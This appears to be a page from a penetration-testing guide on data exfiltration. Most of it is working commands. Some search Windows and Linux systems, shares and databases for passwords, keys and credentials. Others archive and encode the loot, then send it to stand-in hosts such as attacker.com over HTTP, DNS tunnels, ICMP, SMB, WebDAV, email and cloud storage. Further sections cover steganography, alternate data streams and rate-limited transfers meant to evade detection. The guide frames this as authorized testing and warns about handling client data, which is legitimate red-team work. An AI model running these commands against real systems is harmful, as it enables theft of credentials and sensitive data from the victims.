Data Exfiltration
Data exfiltration demonstrates the real-world impact of a breach by extracting sensitive information. This phase validates access and shows stakeholders what an attacker could steal.
Warning
Only exfiltrate data with explicit authorization. Document what data you access and
handle all data according to the Rules of Engagement. Never exfiltrate real PII/PHI
unless specifically required.
flowchart LR
A[Data Discovery] --> B[Collection]
B --> C[Staging]
C --> D[Exfiltration]
D --> E[Evidence]
subgraph Methods
D --> D1[HTTP/S]
D --> D2[DNS]
D --> D3[ICMP]
D --> D4[Cloud]
end
style A fill:#00ff00,stroke:#000,color:#000
style E fill:#a855f7,stroke:#000,color:#000
Data Discovery
Windows File Search
powershell
# Search for sensitive files
dir /s /b C:\*password*.txt C:\*password*.xlsx C:\*credential* 2>nul
dir /s /b C:\*.kdbx C:\*.key C:\*.pem C:\*.pfx 2>nul
# PowerShell search
Get-ChildItem -Path C:\ -Recurse -Include *password*,*credential*,*secret* -ErrorAction SilentlyContinue
# Search file contents
findstr /s /i /m "password" C:\Users\*.txt
findstr /s /i /m "api_key\|secret\|token" C:\Users\*.config
# PowerShell content search
Get-ChildItem -Path C:\Users -Recurse -Include *.txt,*.xml,*.config | Select-String -Pattern "password","secret","key" | Select-Object Path,LineNumber,LineLinux File Search
bash
# Find sensitive files
find / -name "*.conf" -o -name "*.config" -o -name "*password*" 2>/dev/null
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
find /home -name ".bash_history" -o -name ".mysql_history" 2>/dev/null
# Search file contents
grep -r "password" /etc/ 2>/dev/null
grep -r "password\|secret\|api_key" /var/www/ 2>/dev/null
# Find recent files
find / -type f -mtime -7 -name "*.xlsx" -o -name "*.docx" 2>/dev/nullNetwork Share Discovery
powershell
# Enumerate shares
net view \\server
net share
# PowerView
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile
# CrackMapExec
cme smb 10.10.10.0/24 -u user -p pass --shares
cme smb 10.10.10.0/24 -u user -p pass -M spider_plus
# Search for interesting files on shares
smbclient //server/share -U user%pass -c 'recurse;ls'Database Discovery
powershell
# MySQL
mysql -u root -p -e "SHOW DATABASES;"
mysqldump -u root -p database_name > dump.sql
# MSSQL
sqlcmd -S localhost -U sa -P password -Q "SELECT name FROM sys.databases"
sqlcmd -S localhost -U sa -P password -Q "SELECT * FROM sensitive_table" -o output.csv
# PowerUpSQL
Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLInstanceDomain | Get-SQLDatabase
# Extract from web configs
findstr /s /i "connectionstring" C:\inetpub\*.configData Collection & Staging
Archiving Data
powershell
# Windows - Compress for exfil
Compress-Archive -Path C:\Loot\* -DestinationPath C:\Temp\data.zip
# With password (7-Zip)
7z a -p"password" -mhe=on data.7z C:\Loot\*
# Linux
tar -czvf data.tar.gz /path/to/files
zip -r -e data.zip /path/to/files
# Split large files
split -b 50M data.tar.gz data_part_Encoding/Encryption
bash
# Base64 encode
# Windows
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\data.zip")) > encoded.txt
certutil -encode data.zip encoded.txt
# Linux
base64 data.tar.gz > encoded.txt
cat data.tar.gz | gzip | base64
# Encrypt with OpenSSL
openssl enc -aes-256-cbc -salt -in data.tar.gz -out data.enc -k password
# GPG encryption
gpg -c --cipher-algo AES256 data.tar.gzExfiltration Methods
HTTP/HTTPS
bash
# Simple HTTP POST
curl -X POST -F "file=@data.zip" https://attacker.com/upload
# PowerShell
$bytes = [IO.File]::ReadAllBytes("C:\data.zip")
Invoke-WebRequest -Uri "https://attacker.com/upload" -Method POST -Body $bytes
# Python HTTP server (receiver)
python3 -m http.server 8080 # For downloads
# For uploads use custom script or tools like updog
# wget POST
wget --post-file=data.zip https://attacker.com/uploadDNS Exfiltration
Information
DNS exfiltration is slow but often bypasses egress filtering.
Useful when HTTP/HTTPS is blocked.
bash
# DNScat2 Server
dnscat2-server attacker.com
# DNScat2 Client (on target)
./dnscat attacker.com
# Manual DNS exfil (encode data in subdomains)
# Max ~63 chars per label, ~253 total
# Base64 encode and chunk
for chunk in $(cat data.b64 | fold -w50); do
nslookup $chunk.exfil.attacker.com
done
# Iodine (DNS tunnel)
# Server
iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
# Client
iodine -f -P password tunnel.attacker.comICMP Exfiltration
bash
# ptunnel (ICMP tunnel)
# Server
ptunnel-ng -s
# Client
ptunnel-ng -p proxy_ip -l 8000 -r attacker.com -R 22
# Manual ICMP exfil (PowerShell)
$ping = New-Object System.Net.NetworkInformation.Ping
$data = [System.Text.Encoding]::ASCII.GetBytes("secretdata")
$ping.Send("attacker_ip", 1000, $data)Cloud Storage
bash
# AWS S3
aws s3 cp data.zip s3://exfil-bucket/
# Azure Blob
az storage blob upload --container-name exfil --file data.zip --name data.zip
# Rclone (supports many providers)
rclone copy data.zip remote:exfil/
# Google Drive (using gdrive)
gdrive upload data.zipSMB/WebDAV
powershell
# Copy to SMB share
copy data.zip \\attacker\share\
xcopy /s C:\Loot \\attacker\share\Loot
# Mount WebDAV and copy
net use Z: https://attacker.com/webdav /user:user pass
copy data.zip Z:\
# Linux SMB
smbclient //attacker/share -U user -c 'put data.zip' powershell
# PowerShell SMTP
$smtp = New-Object Net.Mail.SmtpClient("smtp.company.com")
$msg = New-Object Net.Mail.MailMessage
$msg.From = "user@company.com"
$msg.To.Add("attacker@external.com")
$msg.Subject = "Report"
$attachment = New-Object Net.Mail.Attachment("C:\data.zip")
$msg.Attachments.Add($attachment)
$smtp.Send($msg)
# swaks (command line)
swaks --to attacker@external.com --from user@company.com --server smtp.company.com --attach data.zipCovert Channels
Steganography
bash
# Hide data in images
steghide embed -cf image.jpg -ef secret.txt
# Extract
steghide extract -sf image.jpg
# OpenStego
openstego embed -mf secret.txt -cf cover.png -sf output.pngAlternate Data Streams (Windows)
powershell
# Hide file in ADS
type secret.txt > innocent.txt:hidden
# Read from ADS
more < innocent.txt:hidden
# List ADS
dir /r
Get-Item -Path innocent.txt -Stream *Exfiltration Tools
PacketWhisper
bash
# DNS-based exfiltration using random DNS queries
# Evades signature detection by using real DNS lookups
# Transmit
python3 packetWhisper.py
# Select cipher, payload, and DNS server optionsDET (Data Exfiltration Toolkit)
bash
# Supports multiple protocols: HTTP, DNS, ICMP, SMTP, Slack, etc.
# Server
python det.py -c config.json -L
# Client (send file)
python det.py -c config.json -f secret.zipCloakify
bash
# Transform data to look like lists (IPs, words, etc.)
python cloakify.py secret.zip ciphers/pokemonNames > pokemon.txt
# Decloakify
python decloakify.py pokemon.txt ciphers/pokemonNamesBandwidth Considerations
bash
# Throttle exfiltration to avoid detection
# Split and delay transfers
# Linux - rate limit
rsync --bwlimit=100 data.tar.gz attacker:/exfil/
# Windows PowerShell - chunked transfer
$chunkSize = 1MB
$file = [IO.File]::OpenRead("C:\data.zip")
$buffer = New-Object byte[] $chunkSize
while (($read = $file.Read($buffer, 0, $chunkSize)) -gt 0) {
# Send chunk
Start-Sleep -Seconds 30 # Delay between chunks
}
# curl rate limit
curl --limit-rate 100K -F "file=@data.zip" https://attacker.com/uploadDocumentation Template
text
# Data Exfiltration Log
| Timestamp | Source System | Data Type | Size | Method | Destination |
|-----------|---------------|-----------|------|--------|-------------|
| 2024-01-15 10:30 | DC01 | NTDS.dit | 500MB | HTTPS | C2 Server |
| 2024-01-15 11:45 | FILESERV | Financials | 2GB | SMB | Attack Box |
| 2024-01-15 14:00 | SQLSRV | DB Dump | 100MB | DNS | Exfil Server |
# Important: Document but DO NOT keep actual sensitive data
# Screenshots and logs as proof, delete actual dataDanger
Delete all exfiltrated data after documentation. Never retain client PII, PHI,
financial data, or other sensitive information beyond engagement requirements.